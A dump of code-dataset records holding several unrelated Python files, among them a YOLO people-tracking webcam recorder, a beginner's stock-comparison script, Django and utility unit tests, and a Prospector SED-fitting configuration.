plt.savefig('{}/derived_parameter_ratio.pdf'.format(directory))\n\n # TODO LIST:\n # 1) check k-corrections for SNANA lightcurves and get the best near/mid-IR lightcurves\n # 2) find physical bounds for lightcurve fitting to avoid unphysical model outputs\n # 3) anti-dither shift observations to remove most of the residual subtraction pattern\n","sub_path":"SN Sampling/sn_sampling.py","file_name":"sn_sampling.py","file_ext":"py","file_size_in_byte":39681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"522267502","text":"from tracking import Tracker, Trackable\nimport cv2\nimport numpy as np\nimport time\n\nframe_size = 416\nframe_count = 0\nmin_confidence = 0.5\nfont=cv2.FONT_HERSHEY_SIMPLEX\n\nheight = 0\nwidth = 0\nfpsFilt=0\n\ntrackers = []\ntrackables = {}\n\n#file_name = './video/test3.mp4'\noutput_name = './output/output_test4.mp4'\n\n# Load Yolo\nnet = cv2.dnn.readNet(\"./model/yolov4-tiny.weights\", \"./cfg/yolov4-tiny.cfg\")\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n# initialize Tracker\ntracker = Tracker()\n\n# initialize the video writer\nwriter = None\nwriter_frame_count = 0\nvideonumber = 0\n\n#gst_out2 = \"appsrc ! video/x-raw ! videoconvert ! x264enc tune=zerolatency bitrate=100 speed-preset=superfast ! rtph264pay config-interval=1 ! udpsink host=192.168.0.46 port=10000 sync=false\"\n\n#writer2 =cv2.VideoWriter(gst_out2,cv2.CAP_GSTREAMER,0,float(12),(640,480),True)\n\ndef writeFrame(img):\n # use global variable, writer\n global writer\n global writer_frame_count\n global videonumber\n output_name = f\"./output/outputvideo_{videonumber}.mp4\"\n \n if writer_frame_count >= 120 or writer_frame_count <= 30:\n writer = None\n videonumber += 1\n write_frame_count = 0\n \n if writer is None and output_name is not None:\n fourcc = cv2.VideoWriter_fourcc(*\"mp4v\")\n writer = cv2.VideoWriter(output_name, fourcc, 6, (img.shape[1], img.shape[0]),True)\n \n if writer is not None:\n writer.write(img)\n writer_frame_count += 1\n\n\nvs = cv2.VideoCapture('v4l2src device=/dev/video0 ! video/x-raw, format=YUY2, framerate=30/1, width=640, height=480 ! videoconvert ! appsink', cv2.CAP_GSTREAMER)\n\n#vs = cv2.VideoCapture(file_name)\n# loop over the frames from the video stream\ncp_frame = np.zeros((480,640,3), dtype=np.uint8)\nfps_rate = vs.get(cv2.CAP_PROP_FPS)\n#prev_time = 0\nwhile True:\n ret, frame = vs.read()\n #cp_frame = frame.copy()\n\n #print(fps_rate)\n if frame is None:\n print('### No more frame ###')\n break\n # Start time capture\n frame_count += 1\n start_time = time.time()\n (height, width) = frame.shape[:2]\n\n # draw a horizontal line in the center of the frame\n\n # construct a blob for YOLO model\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (frame_size, frame_size), (0, 0, 0), True, crop=False)\n net.setInput(blob)\n outs = net.forward(output_layers) # object detection 나옴.\n rects = []\n\n confidences = []\n boxes = []\n\n # 사람일수도, 물체일수도.\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores) # 제일 높은 값을 찾음!!!\n confidence = scores[class_id] # 그 확률값이 얼마나.\n # Filter only 'person'\n if class_id == 0 and confidence > min_confidence:\n\n # Object detected\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n\n # Rectangle coordinates\n x = int(center_x - w / 2) # 시작점의 x\n y = int(center_y - h / 2) # 시작점의 y\n\n boxes.append([x, y, w, h]) # 배열로 계속 넣어줌.\n\n confidences.append(float(confidence))\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, min_confidence, 0.4) # 박스 중복을 줄여주는 거.\n for i in range(len(boxes)):\n if i in indexes:\n x, y, w, h = boxes[i]\n rects.append([x, y, x+w, y+h]) # 이 박스안에 중복된 내용이 있을수도 없을수도.\n label = '{:,.2%}'.format(confidences[i])\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 1) # 박스처리해줌.\n cv2.putText(frame, label, (x + 5, y + 15), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 1)\n\n # use Tracker\n objects = tracker.update(rects)\n total = len(objects)\n # loop over the trackable objects\n # 아디하고 centroid 좌표가 온다.\n for (objectID, centroid) in objects.items():\n # check if a trackable object exists with the object ID\n # 트랙킹 되고 있는 알고리즘.\n trackable = trackables.get(objectID, None)\n\n # 아디 값 오면 trackable이라는 객체가 생성됨.\n if trackable is None:\n trackable = Trackable(objectID, centroid)\n\n\n # store the trackable object in our dictionary\n trackables[objectID] = trackable\n text = \"ID {}\".format(objectID)\n cv2.putText(frame, text, (centroid[0] + 10, centroid[1] + 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv2.circle(frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n info = [\n (\"total\", total),\n ]\n\n # loop over the info tuples and draw them on our frame\n for (i, (k, v)) in enumerate(info):\n text = \"{}: {}\".format(k, v)\n cv2.putText(frame, text, (10, height - ((i * 20) + 20)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)\n\n if total >= 1:\n writeFrame(frame)\n\n # show the output frame\n dt=time.time()-start_time\n timeStamp=time.time()\n fps=1/dt\n fpsFilt=.9*fpsFilt + .1*fps\n #print(str(round(fps,1))+' fps')\n cv2.putText(frame,str(round(fpsFilt,1))+' fps',(0,30),font,1,(0,0,255),2)\n \n cv2.putText(frame, str(writer_frame_count) + ' frame', (10, height - ((i * 20) + 50)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 0), 2)\n cv2.imshow(\"Frame\", frame)\n frame_time = time.time() - start_time\n print(\"Frame {} time {}\".format(frame_count, frame_time))\n \n key = cv2.waitKey(1) & 0xFF\n\n #if total >=1:\n #writer2.write(cp_frame)\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\nvs.release()\nwriter.release()\ncv2.destroyAllWindows()\n","sub_path":"board/src/peopleDetct/src/object_tracking_people.py","file_name":"object_tracking_people.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"28726542","text":"#Armar un programa donde se analize la información de ciertas empresas (entrada del usuario) y se las grafique comparativamente.\n\n#El usuario debe poder seleccionar empresas de una lista de opciones y el programa debe calcular las intersecciones entre los\n#precios de ambas. Se debe permitir graficar esta información de forma gráfica y almacenar en un archivo de excel las fechas donde\n#ocurrieron las intersecciones.\nimport pandas_datareader as pdr\nimport matplotlib.pyplot as plt\nimport datetime \nimport numpy as np\n\n\n\n\npregunta=(input(\"desea ingresar al sistema?\"))\n\nwhile pregunta == \"si\" or pregunta == \"SI\" or pregunta == \"Si\":\n\n print(\"BIENVENIDO PROGRAMA DE COMPARACION DE ACCIONES MERCADO FINANCIERO\")\n print(\"\\n\")\n print(\"Seleccione empresas de la lista en mayuscula\" )\n\n empresas = [\"AAPL\", \"AIG\", \"AMZN\", \"AXP\", \"BA\", \"BAC\", \"CAJ\", \"CAT\", \"CL\", \"CMCSA\", \"COP\", \"CSCO\", \"CVC\", \"CVS\", \"CVX\", \"DD\", \"DELL\",\n \"F\", \"GD\", \"GE\", \"GS\", \"GSK\", \"HD\", \"HMC\", \"HPQ\", \"IBM\", \"JPM\", \"K\", \"KMB\", \"KO\", \"MAR\", \"MCD\", \"MMM\", \"MSFT\", \"NAV\", \n \"NOC\", \"NVS\", \"PEP\", \"PFE\", \"PG\", \"R\", \"RTN\",\"SAP\", \"SNE\", \"SNY\", \"TM\", \"TOT\", \"TWX\", \"TXN\", \"TSLA\", \"UN\", \"VLO\", \"WFC\", \"WMT\", \"XOM\", \"XRX\",\"YHOO\"]\n print(empresas)\n\n empresa = str(input(\"Ingrese empresa a comparar: \"))\n\n if empresa in empresas:\n \n empresa2= str(input(\"Ingrese segunda empresa a comparar: \"))\n\n if empresa2 in empresas and empresa != empresa2:\n #dentro de este if creamos la comparacion y los graficos de las dos empresas mostrando \n #google de color azul y amazon de color rojo \n\n #fUNCION FECHA QUE USUARIO DESEA\n def comprobar_fechain(fechain):\n try:\n datetime.datetime.strptime(fecha, \"%d-%m-%Y\")\n except:\n return \"El formato debe ser DD-MM-YYYY\"\n return datetime.datetime.strptime(fecha, '%d-%m-%Y')\n\n fechain = input(\"Dame fecha hasta donde quiere comparar precios\")\n\n print (comprobar_fechain(fechain))\n\n def comprobar_fechaout(fechaout):\n try:\n datetime.datetime.strptime(fecha, \"%d-%m-%Y\")\n except:\n return \"El formato debe ser DD-MM-YYYY\"\n return datetime.datetime.strptime(fecha, '%d-%m-%Y')\n\n fechaout = input(\"Dame una fecha de inicio de donde quiere comparar precios\") \n\n print (comprobar_fechaout(fechaout))\n \n #DEFINIMOS FECHA DE NUESTROS GRAFICOS \n end = datetime.datetime.strptime(fechain, \"%d-%m-%Y\").isoformat()\n start = datetime.datetime.strptime(fechaout, \"%d-%m-%Y\").isoformat()\n print(start,end)\n\n #ACCIONES\n y=empresa\n stock1 = pdr.get_data_yahoo(y, start=start, end=end)\n close1 = stock1['Close']\n to_dict(\"list1\") \n print(stock1)\n \n x=empresa2\n stock2 = pdr.get_data_yahoo(x, start=start, end=end)\n close2 = stock2['Close'] \n print(stock2)\n\n #Graficamos nuestra serie\n plt.plot(close1, color='b', label=empresa)\n plt.plot(close2, color='r', label=empresa2)\n plt.legend=() #muestra todos los labels\n plt.show() #impresion dos graficos superpuestos \n\n df = pd.read_csv('AAPL.csv')\n \n\n # resultado = list(filter(lambda n: n in empresa, empresa2))\n #print(resultado)\n\n else:\n print(\"Ingrese una empresa de la lista y no repetir\") \n\n else:\n print(\"Debe ingresar el nombre de empresas de la lista para que el programa funcione\")\n\n last=input(\"Desea hacer otra consulta?\")\n\n if last == \"no\" or last == \"NO\" or last == \"No\" or last == \"nO\":\n break\n print(\"Muchas gracias\")\nelse: \n print(\"Muchas gracias\")\n","sub_path":"nuevo.py","file_name":"nuevo.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"640188144","text":"import unittest\n\nfrom shape_tfds.core.collection_utils import sequence\n\n\nclass SequenceTest(unittest.TestCase):\n def test_dict_sequence(self):\n x = [0, 1, 2, 3]\n y = [10, 11, 12, 13]\n dict_seq = sequence.DictSequence(x=x, y=y)\n self.assertEqual(dict_seq[2], dict(x=2, y=12))\n self.assertEqual(len(dict_seq), 4)\n\n def test_zipped_sequence(self):\n x = [0, 1, 2, 3]\n y = [10, 11, 12, 13]\n zipped = sequence.ZippedSequence(x, y)\n self.assertEqual(zipped[2], (2, 12))\n self.assertEqual(len(zipped), 4)\n\n def test_mapped_sequence(self):\n base = range(5)\n mapped = sequence.MappedSequence(base, lambda x: x ** 2)\n self.assertEqual(list(mapped), [x ** 2 for x in base])\n self.assertEqual(mapped[3], 9)\n\n def test_map(self):\n self.assertEqual(\n list(sequence.Sequence.wrapped(range(5)).map(lambda x: x + 1)),\n list(range(1, 6)),\n )\n self.assertEqual(\n list(sequence.Sequence.mapped(range(5), lambda x: x + 1)), list(range(1, 6))\n )\n\n def test_zipped(self):\n zipped = sequence.Sequence.zipped(x=[], y=[])\n self.assertIsInstance(zipped, sequence.DictSequence)\n zipped = sequence.Sequence.zipped([], [])\n self.assertIsInstance(zipped, sequence.ZippedSequence)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"shape_tfds/core/collection_utils/sequence_test.py","file_name":"sequence_test.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7894674","text":"from django.forms import forms\nfrom django.test import TestCase\n\nfrom web3 import Web3\n\nfrom ..filters import EthereumAddressFieldForm, Keccak256FieldForm\n\n\nclass EthereumAddressForm(forms.Form):\n value = EthereumAddressFieldForm()\n\n\nclass Keccak256Form(forms.Form):\n value = Keccak256FieldForm()\n\n\nclass TestForms(TestCase):\n def test_ethereum_address_field_form(self):\n form = EthereumAddressForm(data={\"value\": \"not a ethereum address\"})\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], [\"Enter a valid checksummed Ethereum Address.\"]\n )\n\n form = EthereumAddressForm(\n data={\"value\": \"0xbaa7df320f385318fe3409cc95db48de60dfa033\"}\n )\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], [\"Enter a valid checksummed Ethereum Address.\"]\n )\n\n form = EthereumAddressForm(\n data={\"value\": \"0xbaa7df320f385318fE3409CC95Db48DE60dfA033\"}\n )\n self.assertTrue(form.is_valid())\n\n def test_keccak256_field_form(self):\n form = Keccak256Form(data={\"value\": \"not a hash\"})\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], ['\"not a hash\" is not a valid keccak256 hash.']\n )\n\n form = Keccak256Form(data={\"value\": \"0x1234\"})\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], ['\"0x1234\" keccak256 hash should be 32 bytes.']\n )\n\n form = Keccak256Form(data={\"value\": Web3.keccak(text=\"testing\").hex()})\n self.assertTrue(form.is_valid())\n","sub_path":"gnosis/eth/django/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"264326623","text":"import numpy as np\nimport sys, os\nfrom prospect.models import priors, sedmodel\nfrom prospect.sources import FastStepBasis\nfrom sedpy.observate import load_filters\nfrom prospect.models.templates import adjust_dirichlet_agebins\nfrom scipy.stats import truncnorm\n\n\n\n#############\n# RUN_PARAMS\n#############\n\nrun_params = {'verbose':True,\n 'debug': False,\n 'sed_file': sys.argv[2],\n 'outfile': sys.argv[3],\n # dynesty params\n 'nested_bound': 'multi', # bounding method\n 'nested_sample': 'auto', # sampling method\n 'nested_walks': 50, # MC walks\n 'nested_nlive_batch': 200, # size of live point \"batches\"\n 'nested_nlive_init': 200, # number of initial live points\n 'nested_weight_kwargs': {'pfrac': 1.0}, # weight posterior over evidence by 100%\n 'nested_dlogz_init': 0.01,\n }\n\n############\n# OBS\n#############\n\n\n\ngalex = ['galex_FUV']\nhst_wfc3_uv = ['wfc3_uvis_f275w', 'wfc3_uvis_f336w', 'wfc3_uvis_f475w','wfc3_uvis_f555w', 'wfc3_uvis_f606w', 'wfc3_uvis_f814w']\nsdss = ['sdss_i0']\nhst_wfc3_ir = ['wfc3_ir_f105w', 'wfc3_ir_f125w', 'wfc3_ir_f140w', 'wfc3_ir_f160w']\nspitzer_mips = ['spitzer_mips_24']\n\nherschel_pacs = ['herschel_pacs_70', 'herschel_pacs_100', 'herschel_pacs_160']\nherschel_spire = ['herschel_spire_250', 'herschel_spire_350', 'herschel_spire_500']\n\nfilternames = (galex + hst_wfc3_uv + sdss + hst_wfc3_ir + spitzer_mips + herschel_pacs + herschel_spire)\n\n\ndef load_obs(sed_file = run_params['sed_file'], **kwargs):\n\n from hyperion.model import ModelOutput\n from astropy.cosmology import Planck15\n from astropy import units as u\n from astropy import constants\n m = ModelOutput(sed_file)\n\n wav,flux = m.get_sed(inclination='all',aperture=-1)\n wav = np.asarray(wav)*u.micron #wav is in micron \n wav = wav.to(u.AA)\n #wav *= (1.+z) \n flux = np.asarray(flux)*u.erg/u.s\n dl = 10.0*u.pc\n #dl = Planck15.luminosity_distance(z) \n dl = dl.to(u.cm)\n flux /= (4.*3.14*dl**2.)\n nu = constants.c.cgs/(wav.to(u.cm))\n nu = nu.to(u.Hz)\n\n flux /= nu\n flux = flux.to(u.Jy)\n maggies = flux[0] / 3631.\n\n\n filters = load_filters(filternames)\n filter_wavs = [x.wave_mean for x in filters]\n\n flx = []\n flxe = []\n for i in range(len(filter_wavs)):\n flx.append(maggies[(np.abs(wav.value - filter_wavs[i])).argmin()].value)\n flxe.append(0.01* flx[i])\n flx = np.asarray(flx)\n flxe = np.asarray(flxe)\n\n\n flux_mag = flx\n unc_mag = flxe\n\n obs = {}\n obs['filters'] = filters\n # This is a list of maggies, converted from mJy. It should have the same \n # order as `filters` above. \n obs['maggies'] = flux_mag\n #Uncertainties also converted from mJy. In same order as flux_mag and filters \n obs['maggies_unc'] = unc_mag\n # Here we mask out any NaNs or infs \n obs['phot_mask'] = np.isfinite(flux_mag)\n # We have no spectrum. \n obs['wavelength'] = None\n\n return obs\n\n##########################\n# TRANSFORMATION FUNCTIONS\n##########################\ndef load_gp(**extras):\n return None, None\n\ndef tie_gas_logz(logzsol=None, **extras):\n return logzsol\n\ndef to_dust1(dust1_fraction=None, dust1=None, dust2=None, **extras):\n return dust1_fraction*dust2\n\ndef massmet_to_logmass(massmet=None,**extras):\n return massmet[0]\n\ndef massmet_to_logzsol(massmet=None,**extras):\n return massmet[1]\n\ndef logmass_to_masses(massmet=None, logsfr_ratios=None, agebins=None, **extras):\n logsfr_ratios = np.clip(logsfr_ratios,-10,10) # numerical issues...\n nbins = agebins.shape[0]\n sratios = 10**logsfr_ratios\n dt = (10**agebins[:,1]-10**agebins[:,0])\n coeffs = np.array([ (1./np.prod(sratios[:i])) * (np.prod(dt[1:i+1]) / np.prod(dt[:i])) for i in range(nbins)])\n m1 = (10**massmet[0]) / coeffs.sum()\n\n return m1 * coeffs\n\n\ndef zfrac_to_masses(massmet=None, z_fraction=None, agebins=None, **extras):\n \"\"\"This transforms from independent dimensionless `z` variables to sfr\n fractions and then to bin mass fractions. The transformation is such that\n sfr fractions are drawn from a Dirichlet prior. See Betancourt et al. 2010\n and Leja et al. 2017\n :param total_mass:\n The total mass formed over all bins in the SFH.\n :param z_fraction:\n latent variables drawn form a specific set of Beta distributions. (see\n Betancourt 2010)\n :returns masses:\n The stellar mass formed in each age bin.\n \"\"\"\n # sfr fractions\n sfr_fraction = np.zeros(len(z_fraction) + 1)\n sfr_fraction[0] = 1.0 - z_fraction[0]\n for i in range(1, len(z_fraction)):\n sfr_fraction[i] = np.prod(z_fraction[:i]) * (1.0 - z_fraction[i])\n sfr_fraction[-1] = 1 - np.sum(sfr_fraction[:-1])\n\n # convert to mass fractions\n time_per_bin = np.diff(10**agebins, axis=-1)[:, 0]\n mass_fraction = sfr_fraction * np.array(time_per_bin)\n mass_fraction /= mass_fraction.sum()\n\n masses = (10**massmet[0]) * mass_fraction\n return masses\n\n\n\n#############\n# MODEL_PARAMS\n#############\nmodel_params = []\n\n###### BASIC PARAMETERS ##########\nmodel_params.append({'name': 'zred', 'N': 1,\n 'isfree': False,\n 'init': 0.1,\n 'units': '',\n 'prior': priors.TopHat(mini=0.0, maxi=4.0)})\n\nmodel_params.append({'name': 'lumdist', 'N': 1,\n 'isfree': False,\n 'init': 1.0e-5,\n 'units': 'Mpc'})\n\nmodel_params.append({'name': 'pmetals', 'N': 1,\n 'isfree': False,\n 'init': -99,\n 'units': '', 'prior': None})\n\nmodel_params.append({'name': 'massmet', 'N': 2,\n 'isfree': True,\n 'init': np.array([10,-0.5]), 'prior': None})\n\nmodel_params.append({'name': 'logmass', 'N': 1,\n 'isfree': False,\n 'depends_on': massmet_to_logmass,\n 'init': 10.0,\n 'units': 'Msun', 'prior': None})\n\nmodel_params.append({'name': 'logzsol', 'N': 1,\n 'isfree': False,\n 'init': -0.5,\n 'depends_on': massmet_to_logzsol,\n 'units': r'$\\log (Z/Z_\\odot)$', 'prior': None})\n \n###### SFH ########\n#model_params.append({'name': 'sfh', 'N':1,\n# 'isfree': False,\n# 'init': 0,\n# 'units': None, 'prior': None})\n#\n#model_params.append({'name': 'mass', 'N': 1,\n# 'isfree': False,\n# 'depends_on': logmass_to_masses,\n# 'init': 1.,\n# 'units': r'M$_\\odot$', 'prior': None})\n#\n#model_params.append({'name': 'agebins', 'N': 1,\n# 'isfree': False,\n# 'init': [],\n# 'units': 'log(yr)', 'prior': None})\n#\n#model_params.append({'name': 'logsfr_ratios', 'N': 7,\n# 'isfree': True,\n# 'init': [],\n# 'units': '', 'prior': None})\n\n\n\n\nmodel_params.append({'name': \"sfh\", \"N\": 1, \"isfree\": False, \"init\": 0, \"units\": \"FSPS index\"})\n\nmodel_params.append({'name': \"mass\", 'N': 3, 'isfree': False, 'init': 1., 'units': r'M$_\\odot$',\n 'depends_on': zfrac_to_masses})\n\nmodel_params.append({'name': \"agebins\", 'N': 1, 'isfree': False,\n 'init': [],\n 'units': 'log(yr)'})\n\nmodel_params.append({'name': \"z_fraction\", \"N\": 2, 'isfree': True, 'init': [0, 0], 'units': None,\n 'prior': priors.Beta(alpha=1.0, beta=1.0, mini=0.0, maxi=1.0)})\n\n\n\n\n\n\n\n######## IMF ##############\nmodel_params.append({'name': 'imf_type', 'N': 1,\n 'isfree': False,\n 'init': 2, #Kroupa\n 'prior': ' '\n })\n\n######## Dust Absorption ##############\nmodel_params.append({'name': 'dust_type', 'N': 1,\n 'isfree': False,\n 'init': 4,\n 'units': 'index', 'prior': None})\n \nmodel_params.append({'name': 'dust1', 'N': 1,\n 'isfree': False,\n 'depends_on': to_dust1,\n 'init': 1.0,\n 'units': '', 'prior': None})\n\nmodel_params.append({'name': 'dust1_fraction', 'N': 1,\n 'isfree': True,\n 'init': 1.0,\n 'init_disp': 0.8,\n 'disp_floor': 0.8,\n 'units': '',\n 'prior': priors.ClippedNormal(mini=0.0, maxi=2.0, mean=1.0, sigma=0.3)})\n\nmodel_params.append({'name': 'dust2', 'N': 1,\n 'isfree': True,\n 'init': 1.0,\n 'init_disp': 0.25,\n 'disp_floor': 0.15,\n 'units': '',\n 'prior': priors.ClippedNormal(mini=0.0, maxi=4.0, mean=0.3, sigma=1)})\n\nmodel_params.append({'name': 'dust_index', 'N': 1,\n 'isfree': True,\n 'init': 0.0,\n 'init_disp': 0.25,\n 'disp_floor': 0.15,\n 'units': '',\n 'prior': priors.TopHat(mini=-1.0, maxi=0.4)})\n\nmodel_params.append({'name': 'dust1_index', 'N': 1,\n 'isfree': False,\n 'init': -1.0,\n 'units': '', 'prior': None})\n\nmodel_params.append({'name': 'dust_tesc', 'N': 1,\n 'isfree': False,\n 'init': 7.0,\n 'units': 'log(Gyr)', 'prior': None})\n\n###### Dust Emission ##############\nmodel_params.append({'name': 'add_dust_emission', 'N': 1,\n 'isfree': False,\n 'init': 1,\n 'units': None, 'prior': None})\n\nmodel_params.append({'name': 'duste_gamma', 'N': 1,\n 'isfree': True,\n 'init': 0.01,\n 'init_disp': 0.2,\n 'disp_floor': 0.15,\n 'units': None,\n 'prior': priors.TopHat(mini=0.0, maxi=1.0)})\n\nmodel_params.append({'name': 'duste_umin', 'N': 1,\n 'isfree': True,\n 'init': 1.0,\n 'init_disp': 5.0,\n 'disp_floor': 4.5,\n 'units': None,\n 'prior': priors.TopHat(mini=0.1, maxi=25.0)})\n\nmodel_params.append({'name': 'duste_qpah', 'N': 1,\n 'isfree': True,\n 'init': 2.0,\n 'init_disp': 3.0,\n 'disp_floor': 3.0,\n 'units': 'percent',\n 'prior': priors.TopHat(mini=0.0, maxi=7.0)})\n\n\n\n####### Units ##########\nmodel_params.append({'name': 'peraa', 'N': 1,\n 'isfree': False,\n 'init': False, 'prior': None})\n\nmodel_params.append({'name': 'mass_units', 'N': 1,\n 'isfree': False,\n 'init': 'mformed', 'prior': None})\n\n#### resort list of parameters for later display purposes\n#parnames = [m['name'] for m in model_params]\n#fit_order = ['massmet','logsfr_ratios', 'dust2', 'dust_index', 'dust1_fraction', 'duste_gamma', 'duste_umi#n', 'duste_qpah']\n#tparams = [model_params[parnames.index(i)] for i in fit_order]\n#for param in model_params: \n# if param['name'] not in fit_order:\n# tparams.append(param)\n#model_params = tparams\n\n\n\n\n\n##### Mass-metallicity prior ######\nclass MassMet(priors.Prior):\n \"\"\"A Gaussian prior designed to approximate the Gallazzi et al. 2005 \n stellar mass--stellar metallicity relationship.\n \"\"\"\n\n prior_params = ['mass_mini', 'mass_maxi', 'z_mini', 'z_maxi']\n distribution = truncnorm\n massmet = np.loadtxt('/ufrc/narayanan/s.lower/simSEDs/simbam25n512_newfof/snap305_massmetal/gallazzi_05_massmet.txt')\n\n def __len__(self):\n \"\"\" Hack to work with Prospector 0.3\n \"\"\"\n return 2\n\n def scale(self,mass):\n upper_84 = np.interp(mass, self.massmet[:,0], self.massmet[:,3]) \n lower_16 = np.interp(mass, self.massmet[:,0], self.massmet[:,2])\n return (upper_84-lower_16)\n\n def loc(self,mass):\n return np.interp(mass, self.massmet[:,0], self.massmet[:,1])\n\n def get_args(self,mass):\n a = (self.params['z_mini'] - self.loc(mass)) / self.scale(mass)\n b = (self.params['z_maxi'] - self.loc(mass)) / self.scale(mass)\n return [a, b]\n\n @property\n def range(self):\n return ((self.params['mass_mini'], self.params['mass_maxi']),\\\n (self.params['z_mini'], self.params['z_maxi']))\n\n def bounds(self, **kwargs):\n if len(kwargs) > 0:\n self.update(**kwargs)\n return self.range\n\n def __call__(self, x, **kwargs):\n \"\"\"Compute the value of the probability density function at x and\n return the ln of that.\n\n :params x:\n x[0] = mass, x[1] = metallicity. Used to calculate the prior\n\n :param kwargs: optional\n All extra keyword arguments are used to update the `prior_params`.\n\n :returns lnp:\n The natural log of the prior probability at x, scalar or ndarray of\n same length as the prior object.\n \"\"\"\n if len(kwargs) > 0:\n self.update(**kwargs)\n p = np.atleast_2d(np.zeros_like(x))\n a, b = self.get_args(x[...,0])\n p[...,1] = self.distribution.pdf(x[...,1], a, b, loc=self.loc(x[...,0]), scale=self.scale(x[...,0]))\n with np.errstate(invalid='ignore'):\n p[...,1] = np.log(p[...,1])\n return p\n\n def sample(self, nsample=None, **kwargs):\n \"\"\"Draw a sample from the prior distribution.\n\n :param nsample: (optional)\n Unused\n \"\"\"\n if len(kwargs) > 0:\n self.update(**kwargs)\n mass = np.random.uniform(low=self.params['mass_mini'],high=self.params['mass_maxi'],size=nsample)\n a, b = self.get_args(mass)\n met = self.distribution.rvs(a, b, loc=self.loc(mass), scale=self.scale(mass), size=nsample)\n\n return np.array([mass, met])\n\n def unit_transform(self, x, **kwargs):\n \"\"\"Go from a value of the CDF (between 0 and 1) to the corresponding\n parameter value.\n\n :param x:\n A scalar or vector of same length as the Prior with values between\n zero and one corresponding to the value of the CDF.\n\n :returns theta:\n The parameter value corresponding to the value of the CDF given by\n `x`.\n \"\"\"\n if len(kwargs) > 0:\n self.update(**kwargs)\n mass = x[0]*(self.params['mass_maxi'] - self.params['mass_mini']) + self.params['mass_mini']\n a, b = self.get_args(mass)\n met = self.distribution.ppf(x[1], a, b, loc=self.loc(mass), scale=self.scale(mass))\n return np.array([mass,met])\n\n\ndef load_sps(**extras):\n\n sps = FastStepBasis(compute_vega_mags=False, zcontinuous=1, **extras)\n return sps\n\n\n\n\n#print(model_params)\ndef load_model(nbins_sfh=10, sigma=0.3, df=2, **extras):\n \n # we'll need this to access specific model parameters\n \n n = [p['name'] for p in model_params]\n \n \n agelims_log = np.array([1e-9, 0.1, 0.5, 1.0, 2.0, 3.0, 4.5, 6.0, 9.0, 13.6])\n agelims = np.asarray(np.log10(agelims_log) + 9)\n \n\n agebins = np.array([agelims[:-1], agelims[1:]]).T\n nbins_sfh = len(agelims_log) - 1\n # load nvariables and agebins\n #model_params[n.index('agebins')]['N'] = nbins_sfh\n #model_params[n.index('agebins')]['init'] = agebins\n #model_params[n.index('mass')]['N'] = nbins_sfh\n #model_params[n.index('z_fraction')]['N'] = nbins_sfh-1\n #model_params[n.index('logsfr_ratios')]['init'] = np.full(nbins_sfh-1,0.0) # constant SFH\n #model_params[n.index('logsfr_ratios')]['prior'] = priors.StudentT(mean=np.full(nbins_sfh-1,0.0),\n # scale=np.full(nbins_sfh-1,sigma),\n # df=np.full(nbins_sfh-1,df))\n \n \n\n\n ncomp = nbins_sfh\n # constant SFR\n zinit = np.array([(i-1)/float(i) for i in range(ncomp, 1, -1)])\n\n # Set up the prior in `z` variables that corresponds to a dirichlet in sfr\n # fraction. THIS IS IMPORTANT\n alpha = np.arange(ncomp-1, 0, -1)\n zprior = priors.Beta(alpha=alpha, beta=np.ones_like(alpha), mini=0.0, maxi=1.0)\n\n model_params[n.index('mass')]['N'] = ncomp\n model_params[n.index('agebins')]['N'] = ncomp\n model_params[n.index('agebins')]['init'] = agebins\n model_params[n.index('z_fraction')]['N'] = len(zinit)\n model_params[n.index('z_fraction')]['init'] = zinit\n model_params[n.index('z_fraction')]['prior'] = zprior\n\n\n\n\n\n\n # set mass-metallicity prior\n # insert redshift into model dictionary\n model_params[n.index('massmet')]['prior'] = MassMet(z_mini=-1.98, z_maxi=0.19, mass_mini=7, mass_maxi=13)\n \n #print('\\n\\nmodel params:', model_params)\n\n\n model = sedmodel.SedModel(model_params)\n\n return model\n\n","sub_path":"snap305_massmetal/mass_metal_params.py","file_name":"mass_metal_params.py","file_ext":"py","file_size_in_byte":18044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"574469149","text":"class Node:\r\n def __init__(self, data=None, next=None):\r\n self.data = data\r\n self.next = next\r\n\r\n\r\nclass Linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def get_length(self):\r\n count = 0\r\n itr = self.head\r\n\r\n while itr:\r\n count += 1\r\n itr = itr.next\r\n\r\n return count\r\n\r\n def insert_at_end(self, data):\r\n node = Node(data, None)\r\n\r\n if self.head == None:\r\n self.head = node\r\n return\r\n\r\n itr = self.head\r\n while itr.next:\r\n itr = 